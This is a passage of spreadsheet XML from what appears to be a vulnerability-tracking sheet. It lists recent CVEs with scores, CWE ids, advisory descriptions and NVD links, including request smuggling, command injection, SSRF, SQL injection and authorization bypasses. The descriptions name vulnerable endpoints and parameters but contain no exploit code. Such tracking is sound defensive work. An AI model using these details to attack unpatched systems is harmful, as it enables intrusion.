          <t>A client may issue specially crafted HTTP/1.1 chunked requests to a Jetty server that cause Jetty and an intermediary proxy to interpret different request boundaries, potentially resulting in HTTP request smuggling.
This is caused by Jetty accepting a lone LF character as a terminator in parts of chunked request parsing. Depending on the Jetty version and configured HTTP compliance mode, this may occur in chunk extensions, chunk data termination, or trailer termination.</t>
        </is>
      </c>
      <c r="M1644" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19203</t>
        </is>
      </c>
    </row>
    <row r="1645">
      <c r="A1645" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1645" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28808</t>
        </is>
      </c>
      <c r="C1645" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1645" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1645" s="5" t="inlineStr"/>
      <c r="F1645" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1645" s="5" t="inlineStr"/>
      <c r="H1645" s="5" t="inlineStr">
        <is>
          <t>erlang:erlang\/inets, erlang:erlang\/otp</t>
        </is>
      </c>
      <c r="I1645" s="5" t="inlineStr">
        <is>
          <t>2026-04-07</t>
        </is>
      </c>
      <c r="J1645" s="5" t="inlineStr"/>
      <c r="K1645" s="5" t="inlineStr">
        <is>
          <t>CWE-551, CWE-863</t>
        </is>
      </c>
      <c r="L1645" s="5" t="inlineStr">
        <is>
          <t>Incorrect Authorization vulnerability in Erlang OTP (inets modules) allows unauthenticated access to CGI scripts protected by directory rules when served via script_alias.
When script_alias maps a URL prefix to a directory outside DocumentRoot, mod_auth evaluates directory-based access controls against the DocumentRoot-relative path while mod_cgi executes the script at the ScriptAlias-resolved path. This path mismatch allows unauthenticated access to CGI scripts that directory rules were meant to protect.
This vulnerability is associated with program files lib/inets/src/http_server/mod_alias.erl, lib/inets/src/http_server/mod_auth.erl, and lib/inets/src/http_server/mod_cgi.erl.
This issue affects OTP from OTP 17.0 before OTP 26.2.5.19, OTP 27.3.4.10, and OTP 28.4.2, corresponding to inets from 5.10 before 9.1.0.6, 9.3.2.4, and 9.6.2. Whether OTP before OTP 17.0, corresponding to inets before 5.10, is affected is unknown.</t>
        </is>
      </c>
      <c r="M1645" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28808</t>
        </is>
      </c>
    </row>
    <row r="1646">
      <c r="A1646" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1646" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-29988</t>
        </is>
      </c>
      <c r="C1646" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1646" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1646" s="5" t="inlineStr"/>
      <c r="F1646" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1646" s="5" t="inlineStr"/>
      <c r="H1646" s="5" t="inlineStr"/>
      <c r="I1646" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1646" s="5" t="inlineStr"/>
      <c r="K1646" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="L1646" s="5" t="inlineStr">
        <is>
          <t>A cleartext transmission of sensitive information vulnerability in the NFC interface of multiple Milesight IoT device models running affected firmware versions allows an unauthenticated attacker with physical proximity to retrieve LoRaWAN ABP NwkSKey and AppSKey values and D2D keys via an NFC read operation. The exposed keys can be used to decrypt LoRaWAN traffic, forge uplink and downlink frames, submit falsified sensor data, issue supported device commands, and cause subsequent legitimate frames to be rejected.</t>
        </is>
      </c>
      <c r="M1646" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-29988</t>
        </is>
      </c>
    </row>
    <row r="1647">
      <c r="A1647" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1647" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38820</t>
        </is>
      </c>
      <c r="C1647" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1647" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1647" s="5" t="inlineStr"/>
      <c r="F1647" s="5" t="n">
        <v>0.017</v>
      </c>
      <c r="G1647" s="5" t="inlineStr"/>
      <c r="H1647" s="5" t="inlineStr"/>
      <c r="I1647" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1647" s="5" t="inlineStr"/>
      <c r="K1647" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1647" s="5" t="inlineStr">
        <is>
          <t>openNDS before 11.0.0 is susceptible to unauthenticated OS command execution via shell command injection through the fas query parameter on the /opennds_preauth/ endpoint because of libopennds.sh.</t>
        </is>
      </c>
      <c r="M1647" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38820</t>
        </is>
      </c>
    </row>
    <row r="1648">
      <c r="A1648" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1648" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45730</t>
        </is>
      </c>
      <c r="C1648" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1648" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1648" s="5" t="inlineStr"/>
      <c r="F1648" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1648" s="5" t="inlineStr"/>
      <c r="H1648" s="5" t="inlineStr"/>
      <c r="I1648" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1648" s="5" t="inlineStr"/>
      <c r="K1648" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1648" s="5" t="inlineStr">
        <is>
          <t>Nuclio is a "Serverless" framework for Real-Time Events and Data Processing. Prior to version 1.16.0, there is a vulnerability in Nuclio Dashboard's project management API, allowing any authenticated user (without membership in the target project) to bypass OPA authorization checks on write paths (PUT /api/projects/{id}, DELETE /api/projects) and modify or delete any project along with all its associated resources (functions, API gateways, etc.). This issue has been patched in version 1.16.0.</t>
        </is>
      </c>
      <c r="M1648" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45730</t>
        </is>
      </c>
    </row>
    <row r="1649">
      <c r="A1649" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1649" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48105</t>
        </is>
      </c>
      <c r="C1649" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1649" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1649" s="5" t="inlineStr"/>
      <c r="F1649" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1649" s="5" t="inlineStr"/>
      <c r="H1649" s="5" t="inlineStr"/>
      <c r="I1649" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J1649" s="5" t="inlineStr"/>
      <c r="K1649" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-345, CWE-913</t>
        </is>
      </c>
      <c r="L1649" s="5" t="inlineStr">
        <is>
          <t>Arc is an open, SQL-native time-series database for telemetry. Prior to version 26.06.1, Arc Enterprise's Raft FSM (`internal/cluster/raft/fsm.go:applyRegisterFile`) accepts attacker-chosen file paths in manifest-registration proposals without validating them against the configured storage backend. The only check is that the path is non-empty. There is no parent-traversal (`..`) rejection, no allowlist of legitimate prefixes, no scheme restriction (`s3://` vs local), and no length bound. This is fixed in 2026.06.1. Some workarounds are available. Restrict cluster network access to known-trusted peers via strict firewall rules, audit the cluster manifest for unexpected paths (any path not matching the configured storage backend root is suspect), and/or disable cluster mode until the fix is available.</t>
        </is>
      </c>
      <c r="M1649" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48105</t>
        </is>
      </c>
    </row>
    <row r="1650">
      <c r="A1650" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1650" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48106</t>
        </is>
      </c>
      <c r="C1650" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1650" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1650" s="5" t="inlineStr"/>
      <c r="F1650" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1650" s="5" t="inlineStr"/>
      <c r="H1650" s="5" t="inlineStr"/>
      <c r="I1650" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J1650" s="5" t="inlineStr"/>
      <c r="K1650" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-345, CWE-924</t>
        </is>
      </c>
      <c r="L1650" s="5" t="inlineStr">
        <is>
          <t>Arc is an open, SQL-native time-series database for telemetry. Prior to version 26.06.1, Arc Enterprise's cluster replication receiver at `internal/cluster/replication/receiver.go` validates only the wire-format envelope (length, opcode) of inbound messages. The `MsgReplicateSync` payload itself is accepted without any application-layer authentication — no HMAC, no signature, no per-message nonce. The replication stream is protected at the transport layer by TLS / mTLS, but there is no protection against application-layer message tampering or replay once a peer is on the cluster network. This is fixed in 2026.06.1. Some workarounds are available. Restrict cluster network access to known-trusted peers via strict firewall rules, audit replication logs for unexpected `MsgReplicateSync` traffic, and/or disable cluster mode until the fix is available.</t>
        </is>
      </c>
      <c r="M1650" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48106</t>
        </is>
      </c>
    </row>
    <row r="1651">
      <c r="A1651" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1651" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49224</t>
        </is>
      </c>
      <c r="C1651" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1651" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1651" s="5" t="inlineStr"/>
      <c r="F1651" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1651" s="5" t="inlineStr"/>
      <c r="H1651" s="5" t="inlineStr"/>
      <c r="I1651" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1651" s="5" t="inlineStr"/>
      <c r="K1651" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1651" s="5" t="inlineStr">
        <is>
          <t>Vvveb is a powerful and easy to use CMS with page builder to build websites, blogs or ecommerce stores. Prior to 1.0.8.4, Vvveb backend post revision operations allow a low-privileged Author to access revisions for posts owned by another Author. The admin/controller/content/revisions.php controller and admin/sql/sqlite/post_content_revision.sql queries trust caller-controlled post_id, language_id, and created_at values without consistently applying the current admin_id to revision lists, reads, restores, and deletes. An attacker can read historic post content, restore a revision over another Author's live post content, or delete revision records, exposing drafts, corrupting published content, and removing audit history. This issue is fixed in version 1.0.8.4.</t>
        </is>
      </c>
      <c r="M1651" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49224</t>
        </is>
      </c>
    </row>
    <row r="1652">
      <c r="A1652" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1652" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49225</t>
        </is>
      </c>
      <c r="C1652" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1652" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1652" s="5" t="inlineStr"/>
      <c r="F1652" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1652" s="5" t="inlineStr"/>
      <c r="H1652" s="5" t="inlineStr"/>
      <c r="I1652" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1652" s="5" t="inlineStr"/>
      <c r="K1652" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1652" s="5" t="inlineStr">
        <is>
          <t>Vvveb is a powerful and easy to use CMS with page builder to build websites, blogs or ecommerce stores. Prior to 1.0.8.4, Vvveb backend product revision operations allow a low-privileged Vendor to access revisions for products owned by another Vendor. The admin/controller/product/revisions.php route reuses admin/controller/content/revisions.php, while admin/sql/sqlite/product_content_revision.sql trusts caller-controlled product_id, language_id, and created_at values without applying the current admin_id to revision reads, restores, and deletes. An attacker can read historic product content, restore a revision over another Vendor's live product content, or delete revision records, exposing private copy, corrupting product pages, and removing audit history. This issue is fixed in version 1.0.8.4.</t>
        </is>
      </c>
      <c r="M1652" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49225</t>
        </is>
      </c>
    </row>
    <row r="1653">
      <c r="A1653" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1653" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49226</t>
        </is>
      </c>
      <c r="C1653" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1653" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1653" s="5" t="inlineStr"/>
      <c r="F1653" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1653" s="5" t="inlineStr"/>
      <c r="H1653" s="5" t="inlineStr"/>
      <c r="I1653" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1653" s="5" t="inlineStr"/>
      <c r="K1653" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1653" s="5" t="inlineStr">
        <is>
          <t>Vvveb is a powerful and easy to use CMS with page builder to build websites, blogs or ecommerce stores. Prior to 1.0.8.4, Vvveb backend post operations allow a low-privileged Author to access posts owned by another Author. The admin/controller/content/posts.php controller permits filter[admin_id] to replace the server-selected admin_id restriction and accepts a caller-controlled post_id for duplicate and delete actions, while admin/sql/sqlite/post.sql does not consistently enforce post.admin_id. An attacker can view post metadata, discover post identifiers, duplicate posts, or delete posts and related content, exposing private drafts and causing content pollution, data loss, or business disruption. This issue is fixed in version 1.0.8.4.</t>
        </is>
      </c>
      <c r="M1653" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49226</t>
        </is>
      </c>
    </row>
    <row r="1654">
      <c r="A1654" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1654" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52769</t>
        </is>
      </c>
      <c r="C1654" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1654" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1654" s="5" t="inlineStr"/>
      <c r="F1654" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1654" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H1654" s="5" t="inlineStr"/>
      <c r="I1654" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1654" s="5" t="inlineStr"/>
      <c r="K1654" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1654" s="5" t="inlineStr">
        <is>
          <t>YesWiki is a wiki system written in PHP. From version 4.6.2 to before version 4.6.6, the POST /api/forms/{formId}/actor/inbox route - exposed publicly with acl:"public" - accepts an HTTP Signature header whose keyId parameter is a URL. HttpSignatureService::verifySignature() parses the header and immediately makes a server-side HTTP GET to that URL, before any cryptographic verification or URL validation. An unauthenticated remote attacker can therefore make YesWiki issue arbitrary outbound HTTP requests to any host the server can reach - internal services, cloud-metadata endpoints (169.254.169.254), intranet-only admin panels, etc. - and read enough back via timing and error-message oracles to scan ports, enumerate services, and (on a real cloud instance) reach IAM metadata. The only deployment-side precondition is that ActivityPub be enabled on at least one Bazar form. This issue has been patched in version 4.6.6.</t>
        </is>
      </c>
      <c r="M1654" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52769</t>
        </is>
      </c>
    </row>
    <row r="1655">
      <c r="A1655" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1655" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52771</t>
        </is>
      </c>
      <c r="C1655" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1655" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1655" s="5" t="inlineStr"/>
      <c r="F1655" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1655" s="5" t="inlineStr"/>
      <c r="H1655" s="5" t="inlineStr"/>
      <c r="I1655" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1655" s="5" t="inlineStr"/>
      <c r="K1655" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1655" s="5" t="inlineStr">
        <is>
          <t>YesWiki is a wiki system written in PHP. From version 4.2.0 to before version 4.6.6, ApiController::deletePage() interpolates a page tag retrieved from the database into a DELETE FROM …_links WHERE to_tag = '$tag' query without escaping. The page tag is attacker-controlled — the POST /api/pages/{tag} API accepts arbitrary URL-encoded values, including single quotes, and stores them. A low-privilege authenticated user can therefore create a page whose tag is a SQL fragment, make the page non-orphaned via the standard {{include page="…"}} link mechanism, and then invoke the delete endpoint to execute arbitrary SQL inside the wiki database - including time-based blind data exfiltration from any table. This issue has been patched in version 4.6.6.</t>
        </is>
      </c>
      <c r="M1655" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52771</t>
        </is>
      </c>
    </row>
    <row r="1656">
      <c r="A1656" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1656" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52877</t>
        </is>
      </c>
      <c r="C1656" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1656" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1656" s="5" t="inlineStr"/>
      <c r="F1656" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1656" s="5" t="inlineStr"/>
      <c r="H1656" s="5" t="inlineStr"/>
      <c r="I1656" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1656" s="5" t="inlineStr"/>
      <c r="K1656" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-749</t>
        </is>
      </c>
      <c r="L1656" s="5" t="inlineStr">
        <is>
          <t>Streambert is a cross-platform Electron Desktop App to stream and download video content. Prior to version 2.6.0, the open-external IPC handler in src/ipc/downloads.js passes a renderer-supplied url directly to Electron's shell.openExternal without validating its protocol. A compromised renderer can submit file: URIs or operating-system-specific custom schemes, causing the host to open local files, access remote resources through registered handlers, or launch scripts and applications supported by those handlers. This issue is fixed in version 2.6.0.</t>
        </is>
      </c>
      <c r="M1656" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52877</t>
        </is>
      </c>
    </row>
    <row r="1657">
      <c r="A1657" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1657" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53507</t>
        </is>
      </c>
      <c r="C1657" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1657" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1657" s="5" t="inlineStr"/>
      <c r="F1657" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1657" s="5" t="inlineStr"/>
      <c r="H1657" s="5" t="inlineStr"/>
      <c r="I1657" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1657" s="5" t="inlineStr"/>
      <c r="K1657" s="5" t="inlineStr">
        <is>
          <t>CWE-1188, CWE-200, CWE-918</t>
        </is>
      </c>
      <c r="L1657" s="5" t="inlineStr">
        <is>
          <t>oasdiff-action is a GitHub Action that detects breaking changes in OpenAPI specs and post a review on every pull request. Before version 0.0.51, the oasdiff actions resolved external $refs in the OpenAPI spec by default (allow-external-refs: true). When an action runs on a pull request whose spec is attacker-controlled — most importantly fork pull requests on public repositories — a $ref in that spec is fetched/read on the runner with no interaction required, enabling SSRF and disclosure of structured files on the runner. This issue has been patched in version 0.0.51.</t>
        </is>
      </c>
      <c r="M1657" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53507</t>
        </is>
      </c>
    </row>
    <row r="1658">
      <c r="A1658" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1658" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54100</t>
        </is>
      </c>
      <c r="C1658" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1658" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1658" s="5" t="inlineStr"/>
      <c r="F1658" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1658" s="5" t="inlineStr">
        <is>
          <t>windows, red hat</t>
        </is>
      </c>
      <c r="H1658" s="5" t="inlineStr">
        <is>
          <t>redhat:openshift_container_platform, redhat:windows_machine_config_operator</t>
        </is>
      </c>
      <c r="I1658" s="5" t="inlineStr">
        <is>
          <t>2026-06-22</t>
        </is>
      </c>
      <c r="J1658" s="5" t="inlineStr"/>
      <c r="K1658" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L1658" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Windows Machine Config Operator (WMCO) for Red Hat OpenShift Container Platform. WMCO establishes SSH connections to Windows worker nodes without verifying the remote server host key. An adjacent-network attacker who can intercept or redirect WMCO's SSH session can capture WICD and kubelet bootstrap credentials transferred during node configuration, enabling compromise of Windows node identities in the cluster.</t>
        </is>
      </c>
      <c r="M1658" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54100</t>
        </is>
      </c>
    </row>
    <row r="1659">
      <c r="A1659" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1659" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57164</t>
        </is>
      </c>
      <c r="C1659" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1659" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1659" s="5" t="inlineStr"/>
      <c r="F1659" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1659" s="5" t="inlineStr"/>
      <c r="H1659" s="5" t="inlineStr"/>
      <c r="I1659" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1659" s="5" t="inlineStr"/>
      <c r="K1659" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1659" s="5" t="inlineStr">
        <is>
          <t>PJSIP is a free and open source multimedia communication library written in C. Prior to commit 8d5956a, a heap buffer overflow exists in the PJLIB-UTIL HTTP client (http_client.c) when buffering an HTTP response body. This affects applications that use the PJLIB-UTIL HTTP client to receive a whole response body at once (a completion callback with no incremental on_data_read callback). When growing the response buffer, an incorrect size calculation based on the server-supplied Content-Length can leave the buffer too small, causing response data to be written past the end of the allocation. A malicious or man-in-the-middle HTTP server can trigger this with a crafted response; impact may range from unexpected application termination to memory corruption. Applications that consume the response incrementally (via on_data_read), or that only connect to trusted servers, are not affected. This issue has been patched via commit 8d5956a.</t>
        </is>
      </c>
      <c r="M1659" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57164</t>
        </is>
      </c>
    </row>
    <row r="1660">
      <c r="A1660" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1660" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69646</t>
        </is>
      </c>
      <c r="C1660" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1660" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1660" s="5" t="inlineStr"/>
      <c r="F1660" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1660" s="5" t="inlineStr"/>
      <c r="H1660" s="5" t="inlineStr"/>
      <c r="I1660" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1660" s="5" t="inlineStr"/>
      <c r="K1660" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L1660" s="5" t="inlineStr">
        <is>
          <t>Improper verification of cryptographic signature in Skype for Business allows an unauthorized attacker to perform spoofing over an adjacent network.</t>
        </is>
      </c>
      <c r="M1660" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69646</t>
        </is>
      </c>
    </row>
    <row r="1661">
      <c r="A1661" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1661" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70473</t>
        </is>
      </c>
      <c r="C1661" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1661" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1661" s="5" t="inlineStr"/>
      <c r="F1661" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1661" s="5" t="inlineStr"/>
      <c r="H1661" s="5" t="inlineStr"/>
      <c r="I1661" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1661" s="5" t="inlineStr"/>
      <c r="K1661" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-202, CWE-862</t>
        </is>
      </c>
      <c r="L1661" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag-and-drop user interface for building customized large language model (LLM) flows. Prior to 3.1.3, Flowise GET /api/v1/upsert-history returns the entire server-wide upsert history instead of being scoped to the requesting user, tenant, or workspace. The response can exceed 100MB and includes sensitive configuration data, including Vector Store settings such as Qdrant Server URL and collection name. The observed behavior indicates missing or insufficient authorization checks, workspace/project/tenant isolation, and pagination or limits, exposing integration parameters and infrastructure details that may enable further targeted attacks. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M1661" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70473</t>
        </is>
      </c>
    </row>
    <row r="1662">
      <c r="A1662" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1662" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70476</t>
        </is>
      </c>
      <c r="C1662" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1662" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1662" s="5" t="inlineStr"/>
      <c r="F1662" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1662" s="5" t="inlineStr"/>
      <c r="H1662" s="5" t="inlineStr"/>
      <c r="I1662" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1662" s="5" t="inlineStr"/>
      <c r="K1662" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-639</t>
        </is>
      </c>
      <c r="L1662" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, several organization billing endpoints in packages/server/src/enterprise/routes/organization.route.ts and packages/server/src/enterprise/controllers/organization.controller.ts accept attacker-controlled Stripe subscriptionId values without verifying that the identifier belongs to the authenticated user's organization. An authenticated attacker can perform unauthorized Stripe subscription operations on other tenants, including changing subscription plans or modifying seat quantities, resulting in financial impact and service disruption. This issue is fixed in 3.1.3.</t>
        </is>
      </c>
      <c r="M1662" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70476</t>
        </is>
      </c>
    </row>
    <row r="1663">
      <c r="A1663" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1663" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73241</t>
        </is>
      </c>
      <c r="C1663" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1663" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1663" s="5" t="inlineStr"/>
      <c r="F1663" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1663" s="5" t="inlineStr"/>
      <c r="H1663" s="5" t="inlineStr"/>
      <c r="I1663" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1663" s="5" t="inlineStr"/>
      <c r="K1663" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L1663" s="5" t="inlineStr">
        <is>
